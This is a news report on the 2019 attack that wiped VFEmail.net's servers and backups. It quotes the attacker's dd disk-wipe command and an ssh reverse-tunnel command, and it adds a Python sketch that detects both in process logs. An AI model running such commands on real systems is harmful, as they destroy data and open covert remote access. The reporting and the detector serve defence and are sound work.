Unknown hackers have launched a cyber attack on email provider VFEmail.net.
The company confirmed that the data was encrypted, but that does not matter: the attackers simply formatted everything.
VFEmail is a service that provides free and premium business email. Currently the website is down and does not connect to the server.
They tweeted yesterday,
“This is not looking good. All externally facing systems, of differing OS’s and remote authentication, in multiple data centers are down.”
“nl101 is up, but no incoming email. I fear all US based data may be lost.”
Caught the perp in the middle of formatting the backup server:
dd if=/dev/zero of=/dev/da0 bs=4194304 seek=1024 count=399559
via: ssh -v -oStrictHostKeyChecking=no -oLogLevel=error -oUserKnownHostsFile=/dev/null [email protected] -R 127.0.0.1:30081:127.0.0.1:22 -N
— VFEmail.net (@VFEmail) February 11, 2019
“At this time, the attacker has formatted all the disks on every server. Every VM is lost. Every file server is lost, every backup server is lost. NL was 100% hosted with a vastly smaller dataset. NL backups by the provider were intact, and service should be up there.”
“Strangely, not all VMs shared the same authentication, but all were destroyed. This was more than a multi-password via ssh exploit, and there was no ransom. Just attack and destroy.”
“This is all I can do at this time. I will need to get into the data center to see if the one file server I caught during formatting can be recovered. If it can, we can restore mail, but most of the infrastructure is lost.”
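The two commands quoted in the tweet above (a dd run that streams zeros onto a raw disk, and an ssh reverse tunnel opened with host-key checking disabled) are patterns a defender can match in process-execution logs. The Python sketch below is an added example, not code from VFEmail or from the original article. The log lines are constructed, `user@host.example` is a placeholder for the redacted target, and the function names are hypothetical.

```python
import shlex
# Constructed sample command lines; user@host.example stands in for the redacted target.
SAMPLE_CMDLINES = [
    "dd if=/dev/zero of=/dev/da0 bs=4194304 seek=1024 count=399559",
    "ssh -v -oStrictHostKeyChecking=no -oLogLevel=error -oUserKnownHostsFile=/dev/null "
    "user@host.example -R 127.0.0.1:30081:127.0.0.1:22 -N",
    "dd if=/home/a/disk.img of=/home/a/copy.img bs=1M",
    "ssh -N -L 8080:127.0.0.1:80 admin@bastion.example",
]
WIPE_SOURCES = {"/dev/zero", "/dev/urandom", "/dev/random"}

def analyze_dd(argv):
    """Report the overwritten range when dd streams filler onto a device node."""
    ops = dict(a.split("=", 1) for a in argv[1:] if "=" in a)
    if ops.get("if") not in WIPE_SOURCES or not ops.get("of", "").startswith("/dev/"):
        return None
    hit = {"rule": "disk-wipe", "target": ops["of"]}
    try:  # plain integers only; size suffixes such as 1M are left unparsed
        bs, seek = int(ops.get("bs", 512)), int(ops.get("seek", 0))
        hit["start_offset"] = bs * seek
        hit["bytes"] = bs * int(ops["count"]) if "count" in ops else None
    except ValueError:
        pass
    return hit

def analyze_ssh(argv):
    """Flag reverse tunnels opened with host-key verification switched off."""
    opts, reverse, it = {}, [], iter(argv[1:])
    for arg in it:
        if arg.startswith("-R"):
            reverse.append(arg[2:] or next(it, ""))
        elif arg.startswith("-o"):
            key, _, val = (arg[2:] or next(it, "")).partition("=")
            opts[key.lower()] = val
    if not reverse or opts.get("stricthostkeychecking") != "no":
        return None
    return {"rule": "reverse-tunnel-no-hostkey-check", "forwards": reverse,
            "known_hosts_discarded": opts.get("userknownhostsfile") == "/dev/null",
            "no_remote_command": "-N" in argv}

def scan(cmdlines):
    """Return (command line, finding) pairs for lines that match a rule."""
    rules, findings = {"dd": analyze_dd, "ssh": analyze_ssh}, []
    for line in cmdlines:
        argv = shlex.split(line)
        rule = rules.get(argv[0].rsplit("/", 1)[-1]) if argv else None
        if rule and (hit := rule(argv)):
            findings.append((line, hit))
    return findings
```

Calling `scan(SAMPLE_CMDLINES)` flags only the first two lines. For the dd line from the tweet it reports a write that starts 4 GiB into /dev/da0 and covers 1,675,871,911,936 bytes (about 1.5 TiB).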
Yesterday, the company reported the cyber attack on its server, and its webmail client went down without notice. The company is currently working to recover users' email. Hackers usually compromise servers in order to use them for other malicious activity, but here all data of US customers has been deleted, on both primary and backup systems.
In November 2015, VFEmail was targeted by a group of hackers who demanded payment from victim companies.